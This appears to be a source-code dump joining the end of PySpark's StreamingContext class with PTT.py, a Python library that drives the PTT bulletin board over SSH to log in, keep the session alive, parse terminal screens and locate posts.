waiting time elapsed before returning from the method.
@param timeout: time to wait in seconds
"""
return self._jssc.awaitTerminationOrTimeout(int(timeout * 1000))
def stop(self, stopSparkContext=True, stopGraceFully=False):
"""
Stop the execution of the streams, with option of ensuring all
received data has been processed.
@param stopSparkContext: Stop the associated SparkContext or not
@param stopGraceFully: Stop gracefully by waiting for the processing
of all received data to be completed
"""
self._jssc.stop(stopSparkContext, stopGraceFully)
if stopSparkContext:
self._sc.stop()
def remember(self, duration):
"""
Set each DStream in this context to remember the RDDs it generated
in the last given duration. DStreams remember RDDs only for a
limited duration of time and release them for garbage collection.
This method allows the developer to specify how long to remember
the RDDs (if the developer wishes to query old data outside the
DStream computation).
@param duration: Minimum duration (in seconds) that each DStream
should remember its RDDs
"""
self._jssc.remember(self._jduration(duration))
def checkpoint(self, directory):
"""
Sets the context to periodically checkpoint the DStream operations for master
fault-tolerance. The graph will be checkpointed every batch interval.
@param directory: HDFS-compatible directory where the checkpoint data
will be reliably stored
"""
self._jssc.checkpoint(directory)
def socketTextStream(self, hostname, port, storageLevel=StorageLevel.MEMORY_AND_DISK_SER_2):
"""
Create an input stream from a TCP source hostname:port. Data is received using
a TCP socket and the received bytes are interpreted as UTF8 encoded ``\\n`` delimited
lines.
@param hostname: Hostname to connect to for receiving data
@param port: Port to connect to for receiving data
@param storageLevel: Storage level to use for storing the received objects
"""
jlevel = self._sc._getJavaStorageLevel(storageLevel)
return DStream(self._jssc.socketTextStream(hostname, port, jlevel), self,
UTF8Deserializer())
def textFileStream(self, directory):
"""
Create an input stream that monitors a Hadoop-compatible file system
for new files and reads them as text files. Files must be written to the
monitored directory by "moving" them from another location within the same
file system. File names starting with . are ignored.
"""
return DStream(self._jssc.textFileStream(directory), self, UTF8Deserializer())
def binaryRecordsStream(self, directory, recordLength):
"""
Create an input stream that monitors a Hadoop-compatible file system
for new files and reads them as flat binary files with records of
fixed length. Files must be written to the monitored directory by "moving"
them from another location within the same file system.
File names starting with . are ignored.
@param directory: Directory to load data from
@param recordLength: Length of each record in bytes
"""
return DStream(self._jssc.binaryRecordsStream(directory, recordLength), self,
NoOpSerializer())
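# Illustrative sketches of the two file-based sources above (directory paths
# and record length are assumptions):
#
#   texts = ssc.textFileStream("/tmp/incoming-text")             # newline-delimited text files
#   records = ssc.binaryRecordsStream("/tmp/incoming-bin", 128)  # fixed 128-byte records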
def _check_serializers(self, rdds):
# make sure they have same serializer
if len(set(rdd._jrdd_deserializer for rdd in rdds)) > 1:
for i in range(len(rdds)):
# reset them to sc.serializer
rdds[i] = rdds[i]._reserialize()
def queueStream(self, rdds, oneAtATime=True, default=None):
"""
Create an input stream from a queue of RDDs or lists. In each batch,
it will process either one or all of the RDDs returned by the queue.
NOTE: changes to the queue after the stream is created will not be recognized.
@param rdds: Queue of RDDs
@param oneAtATime: pick one RDD each time or pick all of them at once.
@param default: The default RDD if there are no more RDDs in the queue
"""
if default and not isinstance(default, RDD):
default = self._sc.parallelize(default)
if not rdds and default:
rdds = [rdds]
if rdds and not isinstance(rdds[0], RDD):
rdds = [self._sc.parallelize(input) for input in rdds]
self._check_serializers(rdds)
queue = self._jvm.PythonDStream.toRDDQueue([r._jrdd for r in rdds])
if default:
default = default._reserialize(rdds[0]._jrdd_deserializer)
jdstream = self._jssc.queueStream(queue, oneAtATime, default._jrdd)
else:
jdstream = self._jssc.queueStream(queue, oneAtATime)
return DStream(jdstream, self, rdds[0]._jrdd_deserializer)
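# A small queueStream sketch for local testing (the RDD contents are arbitrary
# assumptions):
#
#   rdd_queue = [ssc.sparkContext.parallelize(range(i * 10, (i + 1) * 10))
#                for i in range(3)]
#   stream = ssc.queueStream(rdd_queue, oneAtATime=True)
#   stream.pprint()   # one queued RDD is consumed per batch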
def transform(self, dstreams, transformFunc):
"""
Create a new DStream in which each RDD is generated by applying
a function on RDDs of the DStreams. The order of the JavaRDDs in
the transform function parameter will be the same as the order
of corresponding DStreams in the list.
"""
jdstreams = [d._jdstream for d in dstreams]
# change the final serializer to sc.serializer
func = TransformFunction(self._sc,
lambda t, *rdds: transformFunc(rdds).map(lambda x: x),
*[d._jrdd_deserializer for d in dstreams])
jfunc = self._jvm.TransformFunction(func)
jdstream = self._jssc.transform(jdstreams, jfunc)
return DStream(jdstream, self, self._sc.serializer)
def union(self, *dstreams):
"""
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
"""
if not dstreams:
raise ValueError("should have at least one DStream to union")
if len(dstreams) == 1:
return dstreams[0]
if len(set(s._jrdd_deserializer for s in dstreams)) > 1:
raise ValueError("All DStreams should have same serializer")
if len(set(s._slideDuration for s in dstreams)) > 1:
raise ValueError("All DStreams should have same slide duration")
first = dstreams[0]
jrest = [d._jdstream for d in dstreams[1:]]
return DStream(self._jssc.union(first._jdstream, jrest), self, first._jrdd_deserializer)
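# Illustrative sketch for the two combinators above (stream1/stream2 are
# assumed DStreams of the same type and slide duration):
#
#   merged = ssc.union(stream1, stream2)
#   joined = ssc.transform([stream1, stream2],
#                          lambda rdds: rdds[0].union(rdds[1]).distinct())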
|
PTT.py
|
import sys
import time
import re
import threading
import progressbar
import socket
import array
import paramiko
from paramiko import ECDSAKey
from uao import Big5UAOCodec
uao = Big5UAOCodec()
try:
from . import Util
from . import Version
from . import ErrorCode
from . import Information
except SystemError:
import Util
import Version
import ErrorCode
import Information
Version = Version.Ver
LogLevel = Information.LogLevel()
PushType = Information.PushType()
ErrorCode = ErrorCode.ErrorCode()
ReplyPostType = Information.ReplyPostType()
FriendListType = Information.FriendListType()
OperateType = Information.OperateType()
WaterBallOperateType = Information.WaterBallOperateType
WaterBallType = Information.WaterBallType
PostSearchType = Information.PostSearchType
PostDeleteStatus = Information.PostDeleteStatus
class ResponseUnit(object):
def __init__(self, SendMessage, Refresh):
self.__SendMessage = SendMessage
self.__Refresh = Refresh
def getSendMessage(self):
return self.__SendMessage
def needRefresh(self):
return self.__Refresh
class DetectUnit(object):
def __init__(self, DisplayMsg, DetectTarget, Response, BreakDetect=False, ErrCode=0, LogLV=0):
self.__DisplayMsg = DisplayMsg
self.__DetectTarget = DetectTarget
self.__Response = Response
self.__BreakDetect = BreakDetect
self.__ErrCode = ErrCode
if LogLV == 0:
self.__LogLevel = LogLevel.INFO
else:
self.__LogLevel = LogLV
def isMatch(self, Screen):
if self.__DetectTarget in Screen:
return True
return False
def getDisplayMsg(self):
return self.__DisplayMsg
def getDetectTarget(self):
return self.__DetectTarget
def getResponse(self):
return self.__Response
def isBreakDetect(self):
return self.__BreakDetect
def getErrorCode(self):
return self.__ErrCode
def getLogLevel(self):
return self.__LogLevel
PTTBUGDetectUnit = DetectUnit(
'遇到 PTT BUG!!',
'PttBug',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.PttBug
)
GotoMainMenuCommand = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD'
RefreshCommand = '\x0C'
# \x1b\x4fA is Up; Down, Right, Left are B, C, D
MoveUpCommand = '\x1b\x4fA'
MoveDownCommand = '\x1b\x4fB'
MoveRightCommand = '\x1b\x4fC'
MoveLeftCommand = '\x1b\x4fD'
class Library(object):
def __init__(self, ID='', Password='', kickOtherLogin=True, MaxIdleTime=20, _LogLevel=-1, WaterBallHandler=None, LogHandler=None, PreWait=0, EveryWait=0, MaxEveryWait=0, MinEveryWait=0):
self.__host = 'ptt.cc'
self.__ID = ID
self.__Password = Password
self.__kickOtherLogin = kickOtherLogin
self.__LoginMode_Login = 1
self.__LoginMode_Recover = 2
self.__LoginMode_MultiLogin = 3
self.__Refresh = '\x0C'
# screen size
self.width = 80
self.height = 24
# screen buffer
self.screen = ''
self.buf_size = self.width * self.height
self.__LogHandler = LogHandler
self.__LogLevel = LogLevel.INFO
if _LogLevel != -1:
if _LogLevel < LogLevel.MinValue or LogLevel.MaxValue < _LogLevel:
self.Log('LogLevel error: ' + str(_LogLevel))
return None
else:
self.__LogLevel = _LogLevel
self.__isMailBoxFull = False
self.__MailFullAPILock = False
self.__DefaultTimeout = 5
self.__Cursor = '>'
self.__MaxMultiLogin = 5
self.__ConnectList = [None] * self.__MaxMultiLogin
self.__ReceiveData = [''] * self.__MaxMultiLogin
self.__ReceiveRawData = [''] * self.__MaxMultiLogin
self.__PreReceiveData = [''] * self.__MaxMultiLogin
self.__isConnected = [False] * self.__MaxMultiLogin
self.ReceiveData = ''
self.__isBackground = False
self.__delAllWord = '\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08'
self.__ShowProgressBar = True
self.__IdleTime = 0
self.__MaxIdleTime = MaxIdleTime
if PreWait == 0:
self.__PreWait = 0.01
else:
self.__PreWait = PreWait
if EveryWait == 0:
self.__EveryWait = 0.01
else:
self.__EveryWait = EveryWait
if MaxEveryWait == 0:
self.__MaxEveryWait = 0.01
else:
self.__MaxEveryWait = MaxEveryWait
if MinEveryWait == 0:
self.__MinEveryWait = 0.01
else:
self.__MinEveryWait = MinEveryWait
try:
self.Log('偵測到前景執行使用編碼: ' + sys.stdin.encoding)
self.__isBackground = False
except Exception:
self.Log('偵測到背景執行')
self.__isBackground = True
if ID != '':
self.Log('使用者帳號: ' + ID)
if Password != '':
TempPW = ''
for i in range(len(Password)):
TempPW += '*'
self.Log('密碼: ' + TempPW)
self.__SSHKey = ECDSAKey.generate()
self.Log('產生 SSH 金鑰完成')
self.__IdleThread = None
self.__RunIdleThread = False
self.__WaterBallHandler = WaterBallHandler
if self.__WaterBallHandler != None:
self.__MaxIdleTime = 2
self.__WaterBallList = []
# one independent lock per connection channel; [threading.Lock()] * n would alias a single shared lock
self.__APILock = [threading.Lock() for _ in range(self.__MaxMultiLogin)]
self.__ErrorCode = ErrorCode.Success
def __AntiLogout(self):
self.__RunIdleThread = True
while self.__RunIdleThread and threading.main_thread().is_alive():
self.__IdleTime += 1
time.sleep(1)
if self.__IdleTime < self.__MaxIdleTime:
continue
ErrCode, result = self.getTime()
self.__IdleTime = 0
return
def __WaterBallProceeor(self):
if self.__WaterBallHandler == None:
return
while len(self.__WaterBallList) != 0:
CurrentWaterBall = self.__WaterBallList.pop(0)
try:
self.__WaterBallHandler(CurrentWaterBall)
except TypeError:
self.Log('WaterBallHandler 介面錯誤', LogLevel.WARNING)
except:
self.Log('WaterBallHandler 未知錯誤', LogLevel.WARNING)
def __APICheck(self, API):
# sys._getframe().f_code.co_name
# self.__isConnected[ConnectIndex]
if API == 'register' and self.__isConnected[0]:
self.Log('請勿在登入後,執行註冊功能', LogLevel.CRITICAL)
self.__ErrorCode = ErrorCode.MustRunBeforeLogin
return False
if self.__MailFullAPILock:
self.Log('機器人已被卡在信箱區,僅能取得信件與最新信件編號與寄信', LogLevel.CRITICAL)
self.Log('請清理信箱並重新登入機器人', LogLevel.CRITICAL)
self.__ErrorCode = ErrorCode.MailBoxFull
return False
self.__ErrorCode = ErrorCode.Success
return True
def showScreen(self, ErrCode, FunctionName):
ConnectIndex=0
self.Log('PTT 畫面輸出開始')
try:
print(self.__ReceiveData[ConnectIndex].encode(sys.stdin.encoding, "replace").decode(sys.stdin.encoding))
except Exception:
print(self.__ReceiveData[ConnectIndex].encode('utf-8', "replace").decode('utf-8'))
self.Log('PTT 畫面輸出結束')
def __showScreen(self, ErrCode, FunctionName, ConnectIndex=0, _LogLevel=-1):
if _LogLevel == -1:
_LogLevel = self.__LogLevel
if _LogLevel >= self.__LogLevel:
print('-' * 50)
try:
print(self.__PreReceiveData[ConnectIndex].encode(sys.stdin.encoding, "replace").decode(sys.stdin.encoding))
except Exception:
print(self.__PreReceiveData[ConnectIndex].encode('utf-8', "replace").decode('utf-8'))
print('頻道 ' + str(ConnectIndex) + ' 畫面長度為: ' + str(len(self.__ReceiveData[ConnectIndex])) + ' ' + str(len(self.__PreReceiveData[ConnectIndex])))
print('-' * 50)
try:
print(self.__ReceiveData[ConnectIndex].encode(sys.stdin.encoding, "replace").decode(sys.stdin.encoding))
except Exception:
print(self.__ReceiveData[ConnectIndex].encode('utf-8', "replace").decode('utf-8'))
print('錯誤在 ' + FunctionName + ' 函式發生')
print('-' * 50)
def Log(self, Message, _LogLevel=-1):
if _LogLevel == -1:
_LogLevel = LogLevel.INFO
if _LogLevel < LogLevel.MinValue or LogLevel.MaxValue < _LogLevel:
print('[錯誤] MinValue error: ' + str(LogLevel.MinValue))
print('[錯誤] MaxValue error: ' + str(LogLevel.MaxValue))
print('[錯誤] LogLevel error: ' + str(_LogLevel))
return ErrorCode.ErrorInput
if self.__LogLevel <= _LogLevel:
if _LogLevel == LogLevel.DEBUG:
Prefix = '[除錯] '
elif _LogLevel == LogLevel.WARNING:
Prefix = '[警告] '
elif _LogLevel == LogLevel.INFO:
Prefix = '[資訊] '
elif _LogLevel == LogLevel.CRITICAL:
Prefix = '[重要] '
Message = str(Message)
if len(Message) > 0:
Util.Log(Prefix + Message)
if self.__LogHandler != None:
try:
self.__LogHandler(Message)
except TypeError:
self.Log('LogHandler 介面錯誤', LogLevel.WARNING)
except:
self.Log('LogHandler 未知錯誤', LogLevel.WARNING)
return ErrorCode.Success
def operatePTT(self, SendMessage):
self.__IdleTime = 0
ConnectIndex = 0
self.__APILock[ConnectIndex].acquire()
result = self.__operatePTT(0, SendMessage=SendMessage, Refresh=True)
self.__WaterBallProceeor()
self.__APILock[ConnectIndex].release()
return result
def __operatePTT(self, ConnectIndex, SendMessage='', CatchTargetList=[], Refresh=False, ExtraWait=0):
SendMessageTimeout = 10.0
PreWait = self.__PreWait
EveryWait = self.__EveryWait
MaxEveryWait = self.__MaxEveryWait
MinEveryWait = self.__MinEveryWait
if CatchTargetList == None:
CatchTargetList = []
ErrCode = ErrorCode.Success
self.__PreReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex]
self.__ReceiveData[ConnectIndex] = ''
try:
if SendMessage != '':
if Refresh:
SendMessage += self.__Refresh
TimeCout = 0
StartTime = time.time()
time.sleep(PreWait)
while not self.__ConnectList[ConnectIndex].channel.send_ready():
time.sleep(EveryWait)
if TimeCout >= 100:
TimeCout = 0
NowTime = time.time()
if (NowTime - StartTime) >= SendMessageTimeout:
self.Log('超時斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
TimeCout += 1
EncodeMessage, Len = uao.encode(SendMessage)
self.__ConnectList[ConnectIndex].channel.send(EncodeMessage)
TimeCout = 0
StartTime = time.time()
time.sleep(PreWait)
while not self.__ConnectList[ConnectIndex].channel.recv_ready():
time.sleep(EveryWait)
if TimeCout >= 100:
TimeCout = 0
NowTime = time.time()
if (NowTime - StartTime) >= SendMessageTimeout:
self.Log('超時斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
TimeCout += 1
self.__ReceiveData[ConnectIndex] = self.__wait_str(ConnectIndex)
while self.__ConnectList[ConnectIndex].channel.recv_ready():
time.sleep(EveryWait)
self.__ReceiveData[ConnectIndex] += self.__recv_str(ConnectIndex)
# seed with True so that the follow-up read loop below executes at least once
DelateDetect = [True] * 5
while DelateDetect.count(True) == 5:
DelateDetect = [False] * 5
for i in range(5):
time.sleep(PreWait)
while self.__ConnectList[ConnectIndex].channel.recv_ready():
DelateDetect[i] = True
time.sleep(EveryWait)
self.__ReceiveData[ConnectIndex] += self.__recv_str(ConnectIndex)
DelateDetectCount = DelateDetect.count(True)
if DelateDetectCount > 3:
EveryWait += 0.01
if EveryWait > MaxEveryWait:
EveryWait = MaxEveryWait
elif DelateDetectCount == 0:
EveryWait -= 0.01
if EveryWait < MinEveryWait:
EveryWait = MinEveryWait
except socket.timeout:
self.Log('超時斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
except OSError:
self.Log('作業系統錯誤斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
except KeyboardInterrupt:
self.Log('使用者中斷')
self.__ErrorCode = ErrorCode.UserInterrupt
return self.__ErrorCode, -1
except:
self.Log('斷線,重新連線')
self.__connectRemote(ConnectIndex)
return self.__operatePTT(ConnectIndex, SendMessage, CatchTargetList, Refresh, ExtraWait)
# self.__ReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex].decode(encoding='big5',errors='ignore')
# self.__ReceiveRawData[ConnectIndex] = self.__ReceiveData[ConnectIndex]
self.__ReceiveRawData[ConnectIndex], Len = uao.decode(self.__ReceiveData[ConnectIndex])
self.__ReceiveData[ConnectIndex] = self.__ReceiveRawData[ConnectIndex]
self.__ReceiveRawData[ConnectIndex] = self.__cleanScreen(self.__ReceiveRawData[ConnectIndex], NoColor=False)
self.__ReceiveData[ConnectIndex] = self.__cleanScreen(self.__ReceiveData[ConnectIndex])
if ConnectIndex == 0:
self.ReceiveData = self.__ReceiveData[ConnectIndex]
if self.__WaterBallHandler != None:
line = self.__ReceiveData[ConnectIndex].split('\n').pop()
# if '★' in line:
if line.startswith(' ★'):
line = line[3:]
WaterBallAuthor = line[:line.find(' ')]
WaterBallContent = line[line.find(' ') + 1:line.find(' [K')]
# print('WaterBallAuthor: =' + WaterBallAuthor + '=')
# print('WaterBallContent: =' + WaterBallContent + '=')
CurrentWaterBall = Information.WaterBallInformation(WaterBallType.Catch, WaterBallAuthor, WaterBallContent)
self.__WaterBallList.append(CurrentWaterBall)
for i in range(len(CatchTargetList)):
if CatchTargetList[i] in self.__ReceiveData[ConnectIndex]:
self.__ConnectList[ConnectIndex].channel.settimeout(self.__DefaultTimeout)
return ErrorCode.Success, i
self.__ConnectList[ConnectIndex].channel.settimeout(self.__DefaultTimeout)
self.__ErrorCode = ErrCode
return ErrCode, -1
def __cleanScreen(self, screen, NoColor=True):
if not screen:
return screen
# http://asf.atmel.com/docs/latest/uc3l/html/group__group__avr32__utils__print__funcs.html#ga024c3e2852fe509450ebc363df52ae73
# ShowTarget = '洗髮用品、洗臉卸粧用品、沐浴用品、香皂類'
# if ShowTarget in screen:
# self.Log('========================')
# self.Log(str(screen))
# self.Log('========================')
# if '[2J' in screen:
# screen = screen[screen.find('[2J'):]
PreNewLineMark = -1
PTTLibraryNewLineMark = '==PTTLibraryNewLineMark=='
for NewLineMark in range(1, 25):
for Type in range(1, 26):
Target = '[' + str(NewLineMark) + ';' + str(Type) + 'H'
if Target in screen:
if PreNewLineMark == -1:
NewLineCount = screen[:screen.find(Target)].count('\n')
NewLine = NewLineMark - NewLineCount - 1
# if ShowTarget in screen:
# print('NewLineMark', NewLineMark)
# print('NewLineCount', NewLineCount)
# print('NewLine', NewLine)
if NewLine < 1:
NewLine = 1
screen = screen.replace(Target, PTTLibraryNewLineMark * NewLine)
else:
NewLineMarkCount = NewLineMark - PreNewLineMark
NewLineCount = screen[screen.rfind(PTTLibraryNewLineMark) : screen.find(Target)].count('\n')
NewLine = NewLineMarkCount - NewLineCount
# if ShowTarget in screen:
# print('NewLineMark', NewLineMark)
# print('NewLineCount', NewLineCount)
# print('NewLine', NewLine)
if NewLine < 1:
NewLine = 1
screen = screen.replace(Target, PTTLibraryNewLineMark * NewLine)
PreNewLineMark = NewLineMark
screen = screen.replace(PTTLibraryNewLineMark, '\n')
# if ShowTarget in screen:
# self.Log('----------------------')
# self.Log(str(screen))
# self.Log('----------------------')
# screen = screen.replace('[2J ', '')
screen = screen.replace('[2J', '')
if NoColor:
screen = re.sub(r'\[[\d+;]*[mH]', '', screen)
screen = re.sub(r'[\r]', '', screen)
screen = re.sub(r'[\x00-\x08]', '', screen)
screen = re.sub(r'[\x0b\x0c]', '', screen)
screen = re.sub(r'[\x0e-\x1f]', '', screen)
screen = re.sub(r'[\x7f-\xff]', '', screen)
# self.Log('after: ' + str(screen))
return screen
def __wait_str(self, ConnectIndex):
ch = ''
while True:
ch = self.__ConnectList[ConnectIndex].channel.recv(1)
if ch:
break
# return self.__dec_bytes(ch)
return ch
def __recv_str(self, ConnectIndex):
# return self.__dec_bytes(self.__ConnectList[ConnectIndex].channel.recv(self.buf_size))
return self.__ConnectList[ConnectIndex].channel.recv(self.buf_size)
# decode byte array to UTF-8 string
def __dec_bytes(self, bytes):
return bytes.decode('utf-8', errors = 'ignore')
def __connectRemote(self, ConnectIndex):
global ErrorCode
self.__isConnected[ConnectIndex] = False
RetryCount = 0
Retry = False
ErrCode = ErrorCode.Success
while not self.__isConnected[ConnectIndex]:
if Retry:
Retry = False
RetryCount += 1
if RetryCount == 3:
self.__ErrorCode = ErrCode
return ErrCode
else:
RetryCount = 0
try:
self.__isConnected[ConnectIndex] = False
if self.__ConnectList[ConnectIndex] != None:
self.__ConnectList[ConnectIndex] = None
self.Log('連線頻道 ' + str(ConnectIndex) + ' 重啟')
else:
self.Log('連線頻道 ' + str(ConnectIndex) + ' 啟動')
self.__ConnectList[ConnectIndex] = paramiko.SSHClient()
# self.__ConnectList[ConnectIndex].load_system_host_keys()
# self.__ConnectList[ConnectIndex].set_missing_host_key_policy(paramiko.WarningPolicy())
self.__ConnectList[ConnectIndex].set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__ConnectList[ConnectIndex].connect('ptt.cc', username = 'bbs', password = '', pkey = self.__SSHKey)
self.__ConnectList[ConnectIndex].channel = self.__ConnectList[ConnectIndex].invoke_shell(width = self.width, height = self.height)
except paramiko.AuthenticationException:
# print('... Authentication failed')
self.Log('連接至 ' + self.__host + ' SSH 認證失敗')
self.__ErrorCode = ErrorCode.SSHFail
return ErrorCode.SSHFail
# paramiko.SSHException must be caught before the generic Exception handler,
# otherwise this branch would be unreachable
except paramiko.SSHException:
self.Log('建立 SSH 通道失敗')
self.__ErrorCode = ErrorCode.SSHFail
return ErrorCode.SSHFail
except Exception as e:
# print('... Connection failed:', str(e))
self.Log('連接至 ' + self.__host + ' 連線失敗')
self.__ErrorCode = ErrorCode.RemoteHostDown
return ErrorCode.RemoteHostDown
except KeyboardInterrupt:
self.Log('使用者中斷')
self.__ErrorCode = ErrorCode.UserInterrupt
return ErrorCode.UserInterrupt
except:
self.Log('主機沒有回應')
Retry = True
self.__ErrorCode = ErrorCode.UnknowError
ErrCode = ErrorCode.UnknowError
continue
self.Log('頻道 ' + str(ConnectIndex) + ' 建立互動通道成功')
self.__ConnectList[ConnectIndex].channel.settimeout(self.__DefaultTimeout)
if ConnectIndex == 0:
KickMsg = '頻道 ' + str(ConnectIndex) + ' 刪除重複登入的連線' if self.__kickOtherLogin else '不刪除重複登入的連線'
KickResponse = 'y\r' if self.__kickOtherLogin else 'n\r'
else:
KickMsg = '副頻道不刪除重複登入的連線'
KickResponse = 'n\r'
SendMessage = ''
Refresh = True
isBreakDetect = False
# The order of this list determines detection priority
DetectTargetList = [
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 郵件已滿',
'您保存信件數目',
ResponseUnit(GotoMainMenuCommand, True),
),
DetectUnit(
'任意鍵繼續',
'任意鍵',
ResponseUnit(GotoMainMenuCommand, True)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 放棄未完成文章',
'有一篇文章尚未完成',
ResponseUnit('q\r', False)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 密碼錯誤',
'請檢查帳號及密碼大小寫有無輸入錯誤',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.WrongPassword
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 系統負荷過重,重新執行連線',
'為避免系統負荷過重, 請稍後再試',
ResponseUnit(' ', False),
BreakDetect=True,
ErrCode = ErrorCode.WaitTimeout
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 更新與同步線上使用者及好友名單',
'更新與同步線上使用者及好友名單',
ResponseUnit('\x1b\x4fD\x1b\x4fD', False)
),
DetectUnit(
KickMsg,
'刪除其他重複登入的連線',
ResponseUnit(KickResponse, True)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 刪除錯誤嘗試紀錄',
'您要刪除以上錯誤嘗試的記錄嗎',
ResponseUnit('y\r', False)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 登入成功',
'我是' + self.__ID,
ResponseUnit(' ', False),
BreakDetect=True,
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入密碼',
'請輸入您的密碼:',
ResponseUnit(self.__Password + '\r', False)
),
DetectUnit(
'頻道 ' + str(ConnectIndex) + ' 輸入帳號',
'請輸入代號,或以 guest 參觀,或以 new 註冊',
ResponseUnit(self.__ID + '\r', False)
),
PTTBUGDetectUnit
]
LoginFailCount = 0
MaxLoginFail = 2
while not isBreakDetect:
# self.Log('SendMessage: ->' + SendMessage + '<-')
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('登入超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
self.Log('登入操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
LoginFailCount = 0
self.Log(DetectTarget.getDisplayMsg())
if '郵件已滿' in DetectTarget.getDisplayMsg():
self.__isMailBoxFull = True
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
if LoginFailCount < MaxLoginFail:
self.Log('頻道 ' + str(ConnectIndex) + ' 讀取 PTT 畫面..')
Refresh = True
LoginFailCount += 1
SendMessage = ''
continue
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode == ErrorCode.WaitTimeout:
Retry = True
elif ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode
if '> (' in self.__ReceiveData[ConnectIndex]:
self.Log('新式游標模式', LogLevel.DEBUG)
self.__Cursor = '>'
self.__isConnected[ConnectIndex] = True
elif '●(' in self.__ReceiveData[ConnectIndex]:
self.Log('舊式游標模式', LogLevel.DEBUG)
self.__Cursor = '●'
self.__isConnected[ConnectIndex] = True
else:
self.Log('頻道 ' + str(ConnectIndex) + ' 無法偵測游標。重新執行連線')
# return ErrorCode.UnknowError
return ErrorCode.Success
def login(self, ID='', Password=''):
self.__IdleTime = 0
if ID != '':
self.__ID = ID
self.Log('使用者帳號: ' + ID)
if Password != '':
self.__Password = Password
TempPW = ''
for i in range(len(Password)):
TempPW += '*'
self.Log('密碼: ' + TempPW)
if len(self.__Password) > 8:
self.__Password = self.__Password[:8]
self.__ID = self.__ID.replace('\r', '').replace('\n', '')
self.__Password = self.__Password.replace('\r', '').replace('\n', '')
ErrCode = self.__connectRemote(0)
if ErrCode == ErrorCode.Success:
self.__IdleThread = threading.Thread(target=self.__AntiLogout)
self.__IdleThread.start()
self.__ErrorCode = ErrCode
return ErrCode
def logout(self):
ConnectIndex = -1
self.__IdleTime = 0
self.__RunIdleThread = False
if ConnectIndex == -1:
self.Log('準備登出所有頻道')
for index in range(self.__MaxMultiLogin):
self.__isConnected[index] = False
for index in range(self.__MaxMultiLogin):
if self.__ConnectList[index] == None:
continue
self.Log('頻道 ' + str(index) + ' 登出', LogLevel.DEBUG)
SendMessage = GotoMainMenuCommand + ' g\ry\r'
ErrCode, CatchIndex = self.__operatePTT(index, SendMessage=SendMessage)
self.Log('頻道 ' + str(index) + ' 登出成功')
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode
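# A minimal usage sketch of the Library class (illustrative only; the account,
# board name and post index below are assumptions, not part of the library):
#
#   ptt = Library()
#   ErrCode = ptt.login('SomeUser', 'SomePassword')
#   if ErrCode == ErrorCode.Success:
#       ErrCode, Post = ptt.getPost('Test', PostIndex=1)   # fetch post #1 on the Test board
#       ptt.logout()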
def __getNewestPostIndex(self, Board, ConnectIndex=0, SearchType=0, Search=''):
result = 0
CatchList = [
# 0
'文章選讀',
]
# SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fDqs' + Board + '\r\x03\x03 0\r$'
SendMessage = GotoMainMenuCommand + 'qs' + Board + '\r\x03\x03 '
if SearchType == PostSearchType.Keyword:
SendMessage += '/' + Search + '\r'
elif SearchType == PostSearchType.Author:
SendMessage += 'a' + Search + '\r'
elif SearchType == PostSearchType.Push:
SendMessage += 'Z' + Search + '\r'
elif SearchType == PostSearchType.Mark:
SendMessage += 'G' + Search + '\r'
elif SearchType == PostSearchType.Money:
SendMessage += 'A' + Search + '\r'
SendMessage += '0\r$'
Refresh = True
ExtraWait = 0
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, CatchTargetList=CatchList, Refresh=Refresh, ExtraWait=ExtraWait)
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, result
# print(self.__ReceiveData[ConnectIndex])
ReceiveDataLines = self.__ReceiveData[ConnectIndex].split('\n')
ReceiveDataLines = ReceiveDataLines[2:-1]
self.__ReceiveData[ConnectIndex] = '\n'.join(ReceiveDataLines)
self.__ReceiveData[ConnectIndex] = self.__ReceiveData[ConnectIndex][:self.__ReceiveData[ConnectIndex].find('★ ')]
AllIndex = re.findall(r'\d+ ', self.__ReceiveData[ConnectIndex])
if len(AllIndex) == 0:
ErrCode = ErrorCode.UnknowError
